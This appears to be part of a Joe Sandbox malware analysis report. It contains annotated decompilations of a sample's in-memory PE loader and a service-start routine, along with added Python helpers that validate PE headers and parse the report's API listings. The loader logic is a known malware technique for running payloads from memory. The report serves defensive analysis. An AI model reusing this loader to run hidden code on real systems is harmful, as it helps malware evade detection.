                                                                      						if( *((intOrPtr*)(_t90 + 4)) != 0x14c) {
                                                                      							goto L3;
                                                                      						}
                                                                      						// OptionalHeader.SectionAlignment (NT+0x38) must be even
                                                                      						__eflags =  *(_t90 + 0x38) & 0x00000001;
                                                                      						if(( *(_t90 + 0x38) & 0x00000001) != 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t109 =  *(_t90 + 6) & 0x0000ffff;               // FileHeader.NumberOfSections
                                                                      						_t55 =  *(_t90 + 0x14) & 0x0000ffff;             // FileHeader.SizeOfOptionalHeader
                                                                      						__eflags = _t109;
                                                                      						if(_t109 == 0) {
                                                                      							L14:
                                                                      							// SYSTEM_INFO lives at _t127+0x18; its dwPageSize is at +0x1c. E0040F315 rounds up
                                                                      							// to that page size: SizeOfImage (NT+0x50) and the computed end of the last
                                                                      							// section must agree once page-aligned, otherwise ERROR_BAD_EXE_FORMAT.
                                                                      							__imp__GetNativeSystemInfo(_t127 + 0x18, _t115);
                                                                      							_t116 = E0040F315( *((intOrPtr*)(_t90 + 0x50)),  *((intOrPtr*)(_t127 + 0x1c)));
                                                                      							_t58 = E0040F315(_t119,  *((intOrPtr*)(_t127 + 0x1c)));
                                                                      							__eflags = _t116 - _t58;
                                                                      							if(_t116 == _t58) {
                                                                      								_push(0);
                                                                      								// E0040F823 wraps VirtualAlloc: try the preferred ImageBase (NT+0x34) first,
                                                                      								// 0x3000 = MEM_COMMIT|MEM_RESERVE, 4 = PAGE_READWRITE
                                                                      								_t126 = E0040F823( *((intOrPtr*)(_t90 + 0x34)), _t116, 0x3000, 4);
                                                                      								_t128 = _t127 + 0x14;
                                                                      								__eflags = _t126;
                                                                      								if(_t126 != 0) {
                                                                      									L20:
                                                                      									// Zero-initialised (8 = HEAP_ZERO_MEMORY) loader context of 0x40 bytes. Layout as
                                                                      									// used below: +0 headers, +4 codeBase, +0x10 initialized, +0x14 isDLL,
                                                                      									// +0x18 isRelocated, +0x1c alloc, +0x20 free, +0x24 loadLibrary,
                                                                      									// +0x28 getProcAddress, +0x2c freeLibrary, +0x34 userdata, +0x38 exeEntry, +0x3c pageSize.
                                                                      									_t117 = HeapAlloc(GetProcessHeap(), 8, 0x40);
                                                                      									__eflags = _t117;
                                                                      									if(_t117 != 0) {
                                                                      										 *(_t117 + 4) = _t126;
                                                                      										 *((intOrPtr*)(_t117 + 0x1c)) = E0040F823;
                                                                      										// isDLL = (FileHeader.Characteristics & IMAGE_FILE_DLL 0x2000) >> 13
                                                                      										 *(_t117 + 0x14) = ( *(_t90 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
                                                                      										 *((intOrPtr*)(_t117 + 0x20)) = E0040F83A;
                                                                      										 *((intOrPtr*)(_t117 + 0x24)) = E0040F84D;
                                                                      										 *((intOrPtr*)(_t117 + 0x28)) = E0040F858;
                                                                      										 *((intOrPtr*)(_t117 + 0x2c)) = E0040F867;
                                                                      										 *((intOrPtr*)(_t117 + 0x34)) = 0;
                                                                      										 *((intOrPtr*)(_t117 + 0x3c)) =  *((intOrPtr*)(_t128 + 0x1c));
                                                                      										// the buffer must hold OptionalHeader.SizeOfHeaders (NT+0x54) bytes
                                                                      										_t66 = E0040F326( *((intOrPtr*)(_t128 + 0x14)),  *((intOrPtr*)(_t90 + 0x54)));
                                                                      										__eflags = _t66;
                                                                      										if(_t66 == 0) {
                                                                      											L34:
                                                                      											E0040FBF7(_t117);                  // tear the partial mapping and context down
                                                                      											L35:
                                                                      											_t68 = 0;
                                                                      											__eflags = 0;
                                                                      											L36:
                                                                      											return _t68;
                                                                      										}
                                                                      										_push(0);
                                                                      										// Commit the header pages at the new base (0x1000 = MEM_COMMIT) and copy
                                                                      										// SizeOfHeaders bytes into them (E00433220 is memcpy).
                                                                      										_t121 = E0040F823(_t126,  *((intOrPtr*)(_t90 + 0x54)), 0x1000, 4);
                                                                      										E00433220(_t121,  *((intOrPtr*)(_t128 + 0x28)),  *((intOrPtr*)(_t90 + 0x54)));
                                                                      										_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x30)) + 0x3c)) + _t121;   // copied NT headers
                                                                      										 *_t117 = _t73;
                                                                      										 *(_t73 + 0x34) = _t126;                         // patch ImageBase in the copy to the real base
                                                                      										_t74 = E0040F339( *((intOrPtr*)(_t128 + 0x34)), _t90, _t117);   // copy sections into the mapping
                                                                      										__eflags = _t74;
                                                                      										if(_t74 == 0) {
                                                                      											goto L34;
                                                                      										}
                                                                      										// isRelocated (+0x18): true if mapped at the preferred base, otherwise the
                                                                      										// result of the base-relocation pass E0040F63D (delta argument lost by the decompiler)
                                                                      										_t75 =  *_t117;
                                                                      										_t114 =  *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34));
                                                                      										__eflags =  *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34));
                                                                      										if( *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34))) {
                                                                      											_t123 = 1;
                                                                      											__eflags = 1;
                                                                      											 *((intOrPtr*)(_t117 + 0x18)) = 1;
                                                                      										} else {
                                                                      											 *((intOrPtr*)(_t117 + 0x18)) = E0040F63D(_t114);
                                                                      											_t123 = 1;
                                                                      										}
                                                                      										__eflags = E0040F6E9(_t117);                      // resolve the import table
                                                                      										if(__eflags != 0) {
                                                                      											_t77 = E0040F4D9(_t117, __eflags);              // apply final section protections
                                                                      											__eflags = _t77;
                                                                      											if(_t77 == 0) {
                                                                      												goto L34;
                                                                      											}
                                                                      											_t78 = E0040F60C(_t117);                        // run TLS callbacks
                                                                      											__eflags = _t78;
                                                                      											if(_t78 == 0) {
                                                                      												goto L34;
                                                                      											}
                                                                      											_t80 =  *( *_t117 + 0x28);                      // OptionalHeader.AddressOfEntryPoint
                                                                      											__eflags = _t80;
                                                                      											if(_t80 == 0) {
                                                                      												_t48 = _t117 + 0x38;
                                                                      												 *_t48 =  *(_t117 + 0x38) & 0x00000000;        // no entry point: exeEntry = NULL
                                                                      												__eflags =  *_t48;
                                                                      												L41:
                                                                      												_t68 = _t117;
                                                                      												goto L36;
                                                                      											}
                                                                      											_t81 = _t80 + _t126;                            // absolute entry point in the mapping
                                                                      											__eflags =  *(_t117 + 0x14);
                                                                      											if( *(_t117 + 0x14) == 0) {                     // EXE: store exeEntry, caller runs it
                                                                      												 *(_t117 + 0x38) = _t81;
                                                                      												goto L41;
                                                                      											}
                                                                      											// DLL: DllMain(hinstDLL = base, DLL_PROCESS_ATTACH = 1, NULL)
                                                                      											_t82 =  *_t81(_t126, _t123, 0);
                                                                      											__eflags = _t82;
                                                                      											if(_t82 != 0) {
                                                                      												 *((intOrPtr*)(_t117 + 0x10)) = _t123;         // initialized = 1
                                                                      												goto L41;
                                                                      											}
                                                                      											SetLastError(0x45a);                            // ERROR_DLL_INIT_FAILED
                                                                      										}
                                                                      										goto L34;
                                                                      									}
                                                                      									_push(0);
                                                                      									E0040F83A(_t126, 0, 0x8000);                        // context alloc failed: VirtualFree MEM_RELEASE
                                                                      									L19:
                                                                      									SetLastError(0xe);                                  // ERROR_OUTOFMEMORY
                                                                      									L16:
                                                                      									goto L35;
                                                                      								}
                                                                      								_push(0);
                                                                      								// preferred base unavailable: let VirtualAlloc pick any address (relocations applied later)
                                                                      								_t126 = E0040F823(0, _t116, 0x3000, 4);
                                                                      								_t128 = _t128 + 0x14;
                                                                      								__eflags = _t126;
                                                                      								if(_t126 != 0) {
                                                                      									goto L20;
                                                                      								}
                                                                      								goto L19;
                                                                      							}
                                                                      							SetLastError(0xc1);                                     // ERROR_BAD_EXE_FORMAT
                                                                      							goto L16;
                                                                      						}
                                                                      						// Section walk: IMAGE_FIRST_SECTION is NT+0x18+SizeOfOptionalHeader, so _t104 points
                                                                      						// 0xc bytes into each header, at VirtualAddress (+0) and SizeOfRawData (+4); stride 0x28.
                                                                      						_t104 = _t90 + 0x24 + _t55;
                                                                      						__eflags = _t104;
                                                                      						do {
                                                                      							__eflags =  *(_t104 + 4);
                                                                      							_t86 =  *_t104;
                                                                      							if( *(_t104 + 4) != 0) {
                                                                      								_t87 = _t86 +  *(_t104 + 4);                 // VirtualAddress + SizeOfRawData
                                                                      								__eflags = _t87;
                                                                      							} else {
                                                                      								_t87 = _t86 +  *(_t90 + 0x38);               // empty section spans one SectionAlignment unit
                                                                      							}
                                                                      							__eflags = _t87 - _t119;
                                                                      							_t119 =  >  ? _t87 : _t119;                   // keep the highest section end
                                                                      							_t104 = _t104 + 0x28;
                                                                      							_t109 = _t109 - 1;
                                                                      							__eflags = _t109;
                                                                      						} while (_t109 != 0);
                                                                      						goto L14;
                                                                      					}
                                                                      					L3:
                                                                      					SetLastError(0xc1);                                     // ERROR_BAD_EXE_FORMAT
                                                                      				}
                                                                      				L1:
                                                                      				return 0;
                                                                      			}
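The following Python is an added example, not part of the Joe Sandbox report and not code recovered from the sample. It reproduces, on a raw PE32 blob, the structural checks the decompiled function runs before it maps anything: the MZ and PE signatures, the i386 machine type, an even SectionAlignment, the walk over the section table that takes an empty section to span one alignment unit, and the page-rounded comparison of SizeOfImage against the end of the last section. Field offsets are the ones the decompilation reads from the NT headers (Machine at NT+4, SizeOfOptionalHeader at NT+0x14, AddressOfEntryPoint at NT+0x28, ImageBase at NT+0x34, SectionAlignment at NT+0x38, SizeOfImage at NT+0x50, SizeOfHeaders at NT+0x54). The fixed 0x1000 page size is an assumption standing in for GetNativeSystemInfo(), and the sample image is constructed inline. A triage helper like this tells you whether a dumped region, such as the image at 0x400000 in this report, is something this loader would accept and whether it would treat it as a DLL (DllMain called with DLL_PROCESS_ATTACH) or as an EXE whose entry point is stored for the caller.

```python
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D       # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550    # "PE\0\0"
IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_FILE_DLL = 0x2000
PAGE_SIZE = 0x1000                 # assumption: stands in for GetNativeSystemInfo().dwPageSize
ERROR_BAD_EXE_FORMAT = 0xC1        # the value the loader passes to SetLastError on rejection


def align_up(value, alignment):
    """Round up to a power-of-two alignment (the loader's E0040F315)."""
    return (value + alignment - 1) & ~(alignment - 1)


def check_size(size, needed):
    """The loader's E0040F326: the buffer must contain at least 'needed' bytes."""
    return size >= needed


def validate_image(data):
    """Apply the loader's pre-mapping checks; raise ValueError with the Win32 error on rejection."""
    size = len(data)
    if not check_size(size, 0x40) or struct.unpack_from("<H", data, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError(f"{ERROR_BAD_EXE_FORMAT:#x}: no MZ header")
    nt = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if not check_size(size, nt + 0xF8):                     # sizeof(IMAGE_NT_HEADERS32)
        raise ValueError(f"{ERROR_BAD_EXE_FORMAT:#x}: truncated NT headers")
    signature = struct.unpack_from("<I", data, nt)[0]
    machine, num_sections = struct.unpack_from("<HH", data, nt + 0x4)
    opt_size, characteristics = struct.unpack_from("<HH", data, nt + 0x14)
    entry_point = struct.unpack_from("<I", data, nt + 0x28)[0]
    image_base = struct.unpack_from("<I", data, nt + 0x34)[0]
    section_alignment = struct.unpack_from("<I", data, nt + 0x38)[0]
    size_of_image = struct.unpack_from("<I", data, nt + 0x50)[0]
    size_of_headers = struct.unpack_from("<I", data, nt + 0x54)[0]
    if signature != IMAGE_NT_SIGNATURE or machine != IMAGE_FILE_MACHINE_I386:
        raise ValueError(f"{ERROR_BAD_EXE_FORMAT:#x}: not a PE32 i386 image")
    if section_alignment & 1:
        raise ValueError(f"{ERROR_BAD_EXE_FORMAT:#x}: odd SectionAlignment")
    # Section walk as in the loader: first header at NT+0x18+SizeOfOptionalHeader, stride 0x28,
    # VirtualAddress at +0xC, SizeOfRawData at +0x10; no raw data -> one SectionAlignment unit.
    last_end, sections = 0, []
    first_section = nt + 0x18 + opt_size
    for i in range(num_sections):
        sh = first_section + i * 0x28
        if not check_size(size, sh + 0x28):
            raise ValueError(f"{ERROR_BAD_EXE_FORMAT:#x}: truncated section table")
        name = data[sh:sh + 8].rstrip(b"\0").decode("ascii", "replace")
        va, raw_size = struct.unpack_from("<II", data, sh + 0xC)
        last_end = max(last_end, va + (raw_size if raw_size else section_alignment))
        sections.append((name, va, raw_size))
    # Page-rounded SizeOfImage must equal the page-rounded end of the last section.
    if align_up(size_of_image, PAGE_SIZE) != align_up(last_end, PAGE_SIZE):
        raise ValueError(f"{ERROR_BAD_EXE_FORMAT:#x}: SizeOfImage disagrees with section table")
    if not check_size(size, size_of_headers):
        raise ValueError(f"{ERROR_BAD_EXE_FORMAT:#x}: SizeOfHeaders exceeds buffer")
    return {
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),   # DllMain vs. stored exeEntry
        "image_base": image_base,
        "entry_point": entry_point,
        "aligned_size": align_up(size_of_image, PAGE_SIZE),
        "sections": sections,
    }


def loader_result(data):
    """Mirror the loader's return convention: ('ok', info) or ('error', message)."""
    try:
        return "ok", validate_image(data)
    except ValueError as exc:
        return "error", str(exc)


def build_sample_pe(size_of_image=0x3000):
    """Constructed minimal PE32 DLL (headers plus a stub .text); not the analysed sample."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 2, 0, 0, 0, 0xE0,
                           0x2102)  # EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL
    opt_fmt = "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6
    opt_hdr = struct.pack(opt_fmt,
                          0x10B, 0, 0,                 # PE32 magic, linker version
                          0x200, 0, 0x100,             # SizeOfCode, SizeOfInitializedData, SizeOfUninitializedData
                          0x1000, 0x1000, 0x2000,      # AddressOfEntryPoint, BaseOfCode, BaseOfData
                          0x400000, 0x1000, 0x200,     # ImageBase, SectionAlignment, FileAlignment
                          6, 0, 0, 0, 6, 0,            # OS / image / subsystem versions
                          0, size_of_image, 0x200, 0,  # Win32VersionValue, SizeOfImage, SizeOfHeaders, CheckSum
                          2, 0,                        # Subsystem WINDOWS_GUI, DllCharacteristics
                          0x100000, 0x1000, 0x100000, 0x1000, 0, 16)  # stack/heap, LoaderFlags, NumberOfRvaAndSizes
    opt_hdr += b"\0" * (16 * 8)                                         # empty data directories
    sec_fmt = "<8sIIIIIIHHI"
    text = struct.pack(sec_fmt, b".text", 0x100, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    bss = struct.pack(sec_fmt, b".bss", 0x100, 0x2000, 0, 0, 0, 0, 0, 0, 0xC0000080)   # no raw data
    headers = dos + b"PE\0\0" + file_hdr + opt_hdr + text + bss
    headers += b"\0" * (0x200 - len(headers))
    return headers + b"\xC3" * 0x200                                     # .text raw data: "ret" stub
```

With the constructed image, validate_image() reports a DLL based at 0x400000 with entry point RVA 0x1000 and a page-rounded size of 0x3000; shrinking SizeOfImage to 0x2000 makes the page-rounded comparison fail, which is the same condition that sends the decompiled loader to SetLastError(0xc1). Run it over a region dumped from memory (for example the 0x400000 image from this report) to see whether the loader above would accept it and which entry-point path it would take.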































                                                                      [Address gutter of the decompiled listing for E0040F87E: this portion covers instructions 0x0040f88a through 0x0040fab9 (0x00000000 marks lines with no instruction); the addresses were separated from their source lines by extraction.]
                                                                      0x0040fa21
                                                                      0x0040fa36
                                                                      0x0040fa38
                                                                      0x0040fa3b
                                                                      0x0040fa3e
                                                                      0x0040fa46
                                                                      0x0040fa48
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040fa4a
                                                                      0x0040fa4f
                                                                      0x0040fa4f
                                                                      0x0040fa52
                                                                      0x0040fa65
                                                                      0x0040fa65
                                                                      0x0040fa66
                                                                      0x0040fa54
                                                                      0x0040fa5d
                                                                      0x0040fa60
                                                                      0x0040fa60
                                                                      0x0040fa70
                                                                      0x0040fa72
                                                                      0x0040fa76
                                                                      0x0040fa7b
                                                                      0x0040fa7d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040fa81
                                                                      0x0040fa86
                                                                      0x0040fa88
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040fa8c
                                                                      0x0040fa8f
                                                                      0x0040fa91
                                                                      0x0040facb
                                                                      0x0040facb
                                                                      0x0040facb
                                                                      0x0040facf
                                                                      0x0040facf
                                                                      0x00000000
                                                                      0x0040facf
                                                                      0x0040fa93
                                                                      0x0040fa95
                                                                      0x0040fa99
                                                                      0x0040fac6
                                                                      0x00000000
                                                                      0x0040fac6
                                                                      0x0040fa9f
                                                                      0x0040faa1
                                                                      0x0040faa3
                                                                      0x0040fac1
                                                                      0x00000000
                                                                      0x0040fac1
                                                                      0x0040faaa
                                                                      0x0040faaa
                                                                      0x00000000
                                                                      0x0040fa72
                                                                      0x0040f9a3
                                                                      0x0040f9ab
                                                                      0x0040f988
                                                                      0x0040f949
                                                                      0x0040f949
                                                                      0x00000000
                                                                      0x0040f949
                                                                      0x0040f970
                                                                      0x0040f97f
                                                                      0x0040f981
                                                                      0x0040f984
                                                                      0x0040f986
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040f986
                                                                      0x0040f949
                                                                      0x00000000
                                                                      0x0040f949
                                                                      0x0040f900
                                                                      0x0040f900
                                                                      0x0040f902
                                                                      0x0040f902
                                                                      0x0040f906
                                                                      0x0040f908
                                                                      0x0040f90f
                                                                      0x0040f90f
                                                                      0x0040f90a
                                                                      0x0040f90a
                                                                      0x0040f90a
                                                                      0x0040f912
                                                                      0x0040f914
                                                                      0x0040f917
                                                                      0x0040f91a
                                                                      0x0040f91a
                                                                      0x0040f91a
                                                                      0x00000000
                                                                      0x0040f902
                                                                      0x0040f8b2
                                                                      0x0040f8b7
                                                                      0x0040f8b7
                                                                      0x0040f8a0
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 0040F326: SetLastError.KERNEL32(0000000D,0040F89C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0040F87A), ref: 0040F32C
                                                                      • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0040F87A), ref: 0040F8B7
                                                                      • GetNativeSystemInfo.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0040F87A), ref: 0040F925
                                                                      • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 0040F949
                                                                        • Part of subcall function 0040F823: VirtualAlloc.KERNEL32(00000004,00000004,00000004,00000004,0040F967,?,00000000,00003000,00000004,00000000,?,?), ref: 0040F833
                                                                      • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 0040F990
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040F997
                                                                      • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040FAAA
                                                                        • Part of subcall function 0040FBF7: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0040FAB7,?,?,?,?,?), ref: 0040FC67
                                                                        • Part of subcall function 0040FBF7: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0040FC6E
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                      • String ID:
                                                                      • API String ID: 3950776272-0
                                                                      • Opcode ID: 19d652ee8e1fb37ac5de54ebff74aad87dafd3a3e9403f28f8fe0abb4e70e05e
                                                                      • Instruction ID: 33a7be61e84aa27883bb0b1c105bc9acfd387aff3ff777454e050ee7d3b0b444
                                                                      • Opcode Fuzzy Hash: 19d652ee8e1fb37ac5de54ebff74aad87dafd3a3e9403f28f8fe0abb4e70e05e
                                                                      • Instruction Fuzzy Hash: F561E471600201ABD770AF65C881B6B7AA5BF84704F54803AED05ABBC2D7BCD859CBD9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004172C8(char _a4) {
                                                                      				signed int _t14;
                                                                      				void* _t17;
                                                                      				void* _t18;
                                                                      
                                                                      				_t14 = 0;
                                                                       				_t18 = OpenSCManagerW(0, 0, 0x10);	/* 0x10 = SC_MANAGER_QUERY_LOCK_STATUS; the handle is never checked for NULL */
                                                                       				_t17 = OpenServiceW(_t18, E00401EC4( &_a4), 0x10);	/* 0x10 = SERVICE_START; service name is produced by E00401EC4 from _a4 */
                                                                       				if(_t17 != 0) {
                                                                       					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;	/* return value is 1 only if StartServiceW succeeded */
                                                                      					CloseServiceHandle(_t18);
                                                                      					CloseServiceHandle(_t17);
                                                                      				} else {
                                                                      					CloseServiceHandle(_t18);
                                                                      				}
                                                                      				E00401EC9();
                                                                      				return _t14;
                                                                      			}

                                                                       (Per-line instruction address column for E004172C8, spanning 0x004172cd to 0x00417323, omitted.)

                                                                      APIs
                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00416F1E,00000000), ref: 004172D1
                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00416F1E,00000000), ref: 004172E6
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,00416F1E,00000000), ref: 004172F3
                                                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00416F1E,00000000), ref: 004172FE
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,00416F1E,00000000), ref: 00417310
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,00416F1E,00000000), ref: 00417313
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Service$CloseHandle$Open$ManagerStart
                                                                      • String ID:
                                                                      • API String ID: 276877138-0
                                                                      • Opcode ID: 3b4b6a42a88c35492e9b71304e6ff01650c3b585c4971f6a12f6b37ce0a60e4f
                                                                      • Instruction ID: e7c3370e248363d70cca44cf03121932cd1dafa8323dfe7473fd85b1d204e243
                                                                      • Opcode Fuzzy Hash: 3b4b6a42a88c35492e9b71304e6ff01650c3b585c4971f6a12f6b37ce0a60e4f
                                                                      • Instruction Fuzzy Hash: 2DF0E9710143146FD2005B71EC88DBF2ABCDFC5BAAB10042AF901961D2CF78CC869575
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
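The Similarity block of each listing keys the function on an "API ID" derived from its APIs list, and the APIs lists themselves are the quickest way to see what a function touches (here: SCM connect, open, start). As an added example, not code from the Joe Sandbox report or from the analysed sample, the Python below parses the bullet lines of the two APIs lists on this page (copied in as constructed input) into structured records, separates the function's own calls from "Part of subcall function" entries, groups imports per module, and rebuilds the API ID key. The key construction (capitalised words of each API name, Get/Set dropped, grouped by frequency and joined with "$") is an assumption inferred from these two listings only, which it reproduces; it is not a documented Joe Sandbox algorithm, and the numeric "API String ID" hash is not reproduced at all.

```python
"""Parse the "APIs" bullet lines of a Joe Sandbox function listing and rebuild
the "API ID" key from its Similarity block.

Added example, not code from the Joe Sandbox report or from the analysed sample.
The API ID construction is an assumption inferred from the two listings on this
page (which it reproduces), not a documented Joe Sandbox algorithm.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: the API bullet lines of the two function listings on this page.
LISTING_A = """\
• Part of subcall function 0040F326: SetLastError.KERNEL32(0000000D,0040F89C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0040F87A), ref: 0040F32C
• SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0040F87A), ref: 0040F8B7
• GetNativeSystemInfo.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0040F87A), ref: 0040F925
• SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 0040F949
• Part of subcall function 0040F823: VirtualAlloc.KERNEL32(00000004,00000004,00000004,00000004,0040F967,?,00000000,00003000,00000004,00000000,?,?), ref: 0040F833
• GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 0040F990
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040F997
• SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040FAAA
• Part of subcall function 0040FBF7: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0040FAB7,?,?,?,?,?), ref: 0040FC67
• Part of subcall function 0040FBF7: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0040FC6E
"""
LISTING_B = """\
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00416F1E,00000000), ref: 004172D1
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00416F1E,00000000), ref: 004172E6
• CloseServiceHandle.ADVAPI32(00000000,?,00416F1E,00000000), ref: 004172F3
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00416F1E,00000000), ref: 004172FE
• CloseServiceHandle.ADVAPI32(00000000,?,00416F1E,00000000), ref: 00417310
• CloseServiceHandle.ADVAPI32(00000000,?,00416F1E,00000000), ref: 00417313
"""

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

@dataclass
class ApiCall:
    func: str
    module: str
    args: List[str]
    ref: int                       # address of the call instruction
    subcall: Optional[int] = None  # callee address when the call sits inside a subcall

def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the bullet lines into records; raise on any line the pattern does not cover."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = API_LINE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        calls.append(ApiCall(func=m["func"], module=m["mod"],
                             args=[a.strip() for a in m["args"].split(",")],
                             ref=int(m["ref"], 16),
                             subcall=int(m["sub"], 16) if m["sub"] else None))
    return calls

def direct_calls(calls: List[ApiCall]) -> List[str]:
    """API names the function calls itself, in listing order, subcall entries dropped."""
    return [c.func for c in calls if c.subcall is None]

def imports_by_module(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Distinct API names per module, a quick import-style triage view."""
    out: Dict[str, set] = {}
    for c in calls:
        out.setdefault(c.module, set()).add(c.func)
    return {m: sorted(v) for m, v in out.items()}

# Assumed key construction (it matches both listings on this page): split each API name
# into capitalised words, drop the Get/Set verbs (they never appear in the keys although
# SetLastError and GetProcessHeap are listed), count words over all calls including
# subcalls, then emit groups by descending count, alphabetical within a group, "$"-joined.
WORD = re.compile(r"[A-Z][a-z]+")
STOP_WORDS = {"Get", "Set"}

def api_id(calls: List[ApiCall]) -> str:
    counts = Counter(w for c in calls for w in WORD.findall(c.func) if w not in STOP_WORDS)
    by_count: Dict[int, List[str]] = {}
    for word, n in counts.items():
        by_count.setdefault(n, []).append(word)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))

if __name__ == "__main__":
    for name, listing in (("A", LISTING_A), ("B", LISTING_B)):
        calls = parse_api_lines(listing)
        print(name, api_id(calls), direct_calls(calls), imports_by_module(calls))
```

Because each record keeps both the call site (ref) and, where present, the subcall address, the same parser lets you keep only a function's own call sequence when writing a behavioural rule, or fold subcall entries in when you want the fuller picture the report's key is built from. If a listing contains a line shape not seen on this page, parse_api_lines raises rather than silently skipping it.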

                                                                      C-Code - Quality: 94%
                                                                      			E0044E1AD(void* __ecx, signed int _a4, intOrPtr _a8) {
                                                                      				short _v8;
                                                                      				short _t17;
                                                                      				signed int _t18;
                                                                      				signed int _t23;
                                                                      				signed int _t25;
                                                                      				signed int _t26;
                                                                      				signed int _t27;
                                                                      				void* _t30;
                                                                      				void* _t31;
                                                                      				intOrPtr _t32;
                                                                      				intOrPtr _t33;
                                                                      				intOrPtr* _t36;
                                                                      				intOrPtr* _t37;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t23 = _a4;
                                                                      				if(_t23 == 0) {
                                                                      					L21:
                                                                       					_t12 = _a8 + 8; // 0xfde8fe81
                                                                       					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {	/* 0x20001004 = LOCALE_RETURN_NUMBER | LOCALE_IDEFAULTANSICODEPAGE */
                                                                      						_t17 = _v8;
                                                                      						if(_t17 == 0) {
                                                                       							_t17 = GetACP();	/* locale reports code page 0: fall back to the process ANSI code page */
                                                                      						}
                                                                      						L25:
                                                                      						return _t17;
                                                                      					}
                                                                      					L22:
                                                                      					_t17 = 0;
                                                                      					goto L25;
                                                                      				}
                                                                      				_t18 = 0;
                                                                      				if( *_t23 == 0) {
                                                                      					goto L21;
                                                                      				}
                                                                       				_t36 = 0x45b2f8;	/* first wide-string constant (contents not shown in this report); compared two wchar_t per iteration */
                                                                      				_t25 = _t23;
                                                                      				while(1) {
                                                                      					_t30 =  *_t25;
                                                                      					if(_t30 !=  *_t36) {
                                                                      						break;
                                                                      					}
                                                                      					if(_t30 == 0) {
                                                                      						L7:
                                                                      						_t26 = _t18;
                                                                      						L9:
                                                                      						if(_t26 == 0) {
